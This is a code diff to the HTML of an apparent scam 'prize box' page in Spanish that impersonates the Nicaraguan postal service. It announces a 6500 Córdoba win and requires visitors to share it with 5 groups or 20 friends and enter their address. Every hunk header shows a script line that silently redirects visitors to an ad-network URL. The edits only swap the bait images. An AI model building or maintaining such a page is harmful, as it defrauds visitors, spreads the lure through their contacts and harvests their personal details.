--- a/index.html
+++ b/index.html
@@ -162,7 +162,7 @@ t.state && location.replace("//graizoah.com/afu.php?zoneid=1446052")
 			<div class="main-content" id="content3">
 				<div id="boxes" class="boxes">
 					<div class="div_img_gift">
-						<img class="img_gift" src="https://i.ibb.co/PGgGBtk/nicaraguan-cordoba-white-background-computer-generated-d-photo-rendering-64127305.jpg">
+						<img class="img_gift" src="https://i.ibb.co/s3rq1wJ/money.png">
 					</div>
 					<div id="0" class="try temblor">
 						<div class="caja_tapa">
@@ -172,7 +172,7 @@ t.state && location.replace("//graizoah.com/afu.php?zoneid=1446052")
 							<img src="https://cdnbun.com/upload/correosni.bix2.png">
 						</div>
 						<div class="caja_gift">
-							<img src="https://i.ibb.co/qkYySCT/temp.png">
+							<img src="https://i.ibb.co/mNYVXGL/temp.png">
 						</div>
 						<div class="caja">
 							<img src="https://cdnbun.com/upload/correosni.bix3.png">
@@ -186,7 +186,7 @@ t.state && location.replace("//graizoah.com/afu.php?zoneid=1446052")
 							<img src="https://cdnbun.com/upload/correosni.bix2.png">
 						</div>
 						<div class="caja_gift">
-							<img src="https://i.ibb.co/qkYySCT/temp.png">
+							<img src="https://i.ibb.co/mNYVXGL/temp.png">
 						</div>
 						<div class="caja">
 							<img src="https://cdnbun.com/upload/correosni.bix3.png">
@@ -200,7 +200,7 @@ t.state && location.replace("//graizoah.com/afu.php?zoneid=1446052")
 							<img src="https://cdnbun.com/upload/correosni.bix2.png">
 						</div>
 						<div class="caja_gift">
-							<img src="https://i.ibb.co/qkYySCT/temp.png">
+							<img src="https://i.ibb.co/mNYVXGL/temp.png">
 						</div>
 						<div class="caja">
 							<img src="https://cdnbun.com/upload/correosni.bix3.png">
@@ -214,7 +214,7 @@ t.state && location.replace("//graizoah.com/afu.php?zoneid=1446052")
 							<img src="https://cdnbun.com/upload/correosni.bix2.png">
 						</div>
 						<div class="caja_gift">
-							<img src="https://i.ibb.co/qkYySCT/temp.png">
+							<img src="https://i.ibb.co/mNYVXGL/temp.png">
 						</div>
 						<div class="caja">
 							<img src="https://cdnbun.com/upload/correosni.bix3.png">
@@ -228,7 +228,7 @@ t.state && location.replace("//graizoah.com/afu.php?zoneid=1446052")
 							<img src="https://cdnbun.com/upload/correosni.bix2.png">
 						</div>
 						<div class="caja_gift">
-							<img src="https://i.ibb.co/qkYySCT/temp.png">
+							<img src="https://i.ibb.co/mNYVXGL/temp.png">
 						</div>
 						<div class="caja">
 							<img src="https://cdnbun.com/upload/correosni.bix3.png">
@@ -242,7 +242,7 @@ t.state && location.replace("//graizoah.com/afu.php?zoneid=1446052")
 							<img src="https://cdnbun.com/upload/correosni.bix2.png">
 						</div>
 						<div class="caja_gift">
-							<img src="https://i.ibb.co/qkYySCT/temp.png">
+							<img src="https://i.ibb.co/mNYVXGL/temp.png">
 						</div>
 						<div class="caja">
 							<img src="https://cdnbun.com/upload/correosni.bix3.png">
@@ -256,7 +256,7 @@ t.state && location.replace("//graizoah.com/afu.php?zoneid=1446052")
 							<img src="https://cdnbun.com/upload/correosni.bix2.png">
 						</div>
 						<div class="caja_gift">
-							<img src="https://i.ibb.co/qkYySCT/temp.png">
+							<img src="https://i.ibb.co/mNYVXGL/temp.png">
 						</div>
 						<div class="caja">
 							<img src="https://cdnbun.com/upload/correosni.bix3.png">
@@ -270,7 +270,7 @@ t.state && location.replace("//graizoah.com/afu.php?zoneid=1446052")
 							<img src="https://cdnbun.com/upload/correosni.bix2.png">
 						</div>
 						<div class="caja_gift">
-							<img src="https://i.ibb.co/qkYySCT/temp.png">
+							<img src="https://i.ibb.co/mNYVXGL/temp.png">
 						</div>
 						<div class="caja">
 							<img src="https://cdnbun.com/upload/correosni.bix3.png">
@@ -284,7 +284,7 @@ t.state && location.replace("//graizoah.com/afu.php?zoneid=1446052")
 							<img src="https://cdnbun.com/upload/correosni.bix2.png">
 						</div>
 						<div class="caja_gift">
-							<img src="https://i.ibb.co/qkYySCT/temp.png">
+							<img src="https://i.ibb.co/mNYVXGL/temp.png">
 						</div>
 						<div class="caja">
 							<img src="https://cdnbun.com/upload/correosni.bix3.png">
@@ -298,7 +298,7 @@ t.state && location.replace("//graizoah.com/afu.php?zoneid=1446052")
 							<img src="https://cdnbun.com/upload/correosni.bix2.png">
 						</div>
 						<div class="caja_gift">
-							<img src="https://i.ibb.co/qkYySCT/temp.png">
+							<img src="https://i.ibb.co/mNYVXGL/temp.png">
 						</div>
 						<div class="caja">
 							<img src="https://cdnbun.com/upload/correosni.bix3.png">
@@ -312,7 +312,7 @@ t.state && location.replace("//graizoah.com/afu.php?zoneid=1446052")
 							<img src="https://cdnbun.com/upload/correosni.bix2.png">
 						</div>
 						<div class="caja_gift">
-							<img src="https://i.ibb.co/qkYySCT/temp.png">
+							<img src="https://i.ibb.co/mNYVXGL/temp.png">
 						</div>
 						<div class="caja">
 							<img src="https://cdnbun.com/upload/correosni.bix3.png">
@@ -326,7 +326,7 @@ t.state && location.replace("//graizoah.com/afu.php?zoneid=1446052")
 							<img src="https://cdnbun.com/upload/correosni.bix2.png">
 						</div>
 						<div class="caja_gift">
-							<img src="https://i.ibb.co/qkYySCT/temp.png">
+							<img src="https://i.ibb.co/mNYVXGL/temp.png">
 						</div>
 						<div class="caja">
 							<img src="https://cdnbun.com/upload/correosni.bix3.png">
@@ -339,7 +339,7 @@ t.state && location.replace("//graizoah.com/afu.php?zoneid=1446052")
 					<div class="share_body share_page" style="width: 100%;">
 						<div class="share_hd_text">¡Felicidades!</div>
 						<div class="weui_dialog_img prize_img" style="text-align: center;margin: 20px 0;">
-							<img src="https://i.ibb.co/PGgGBtk/nicaraguan-cordoba-white-background-computer-generated-d-photo-rendering-64127305.jpg"
+							<img src="https://i.ibb.co/s3rq1wJ/money.png"
 							 height="170px">
 						</div>
 						<div class="weui_dialog_text" style="color: #222222;">Su premio es: 6500 Cordoba , siga las instrucciones en la página siguiente para reclamar su premio.</div>
@@ -760,7 +760,7 @@ t.state && location.replace("//graizoah.com/afu.php?zoneid=1446052")
 	                                            	Swal.fire({
 														title: '¡Felicidades!',
 														html: '<p style="margin:10px 0;font-size: 14px;font-weight: 600;">¡Lo hiciste! Ganaste 6500 Cordoba </p><p style="margin:1px;">*** LAS NORMAS ***</p><div style="text-align:center;"><p style="margin:1px;">1. Debes informar a 5 grupos o 20 amigos sobre nuestras promociones.</p><p style="margin:1px;">2. Ingrese su dirección y complete el registro.</p><p style="margin:1px;">3. Los regalos se entregarán en un plazo de 5 a 7 días.</p></div>',
-														imageUrl: 'https://i.ibb.co/PGgGBtk/nicaraguan-cordoba-white-background-computer-generated-d-photo-rendering-64127305.jpg',
+														imageUrl: 'https://i.ibb.co/s3rq1wJ/money.png',
 														imageHeight: 180,
 														imageAlt: 'Custom image',
 													}).then(function(){
